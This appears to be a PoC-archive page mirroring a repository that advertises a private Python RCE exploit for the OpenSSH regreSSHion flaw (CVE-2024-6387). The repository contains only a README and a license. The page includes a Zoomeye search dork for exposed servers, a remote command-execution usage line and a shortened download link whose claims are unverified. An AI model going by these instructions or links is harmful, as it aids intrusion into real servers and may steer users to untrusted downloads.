Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-6387 PoC — Openssh: regresshion - race condition in ssh allows rce/dos

Source
https://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit
Associated Vulnerability
Title:Openssh: regresshion - race condition in ssh allows rce/dos (CVE-2024-6387)
Description:A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.
Description
Private x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in
Readme
# CVE-2024-6387-Updated-x64bit
Private x64 RCE exploit (Python) for CVE-2024-6387 [02.07.2024] from exploit.in

> The repository provides a working variant of the CVE-2024-6387 vulnerability exploit with support for real-time active shell, multithreading, entering targets from a file, and color output.

## 🔥 **CVSS: 10/10**

## Description
An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.

## Exploit details
The exploit targets the SIGALRM handler race condition in OpenSSH's sshd, which calls async-signal-unsafe functions. This can be leveraged to achieve remote code execution as root.

## Zoomeye dork
app:"OpenSSH"

## Vulnerable versions: 
OpenSSH 8.5p1 to 9.8p1

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'id'
```

## Download
[Download here](https://t.ly/LPmmz) (securely!)

## Date of published: 01.07.2024
## Contact
principalanthony@exploit.in
File Snapshot

 [4.0K]  /data/pocs/1963cd7001af99bed7147f26dcded0443cc2763e
├── [1.0K]  LICENSE
└── [1.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →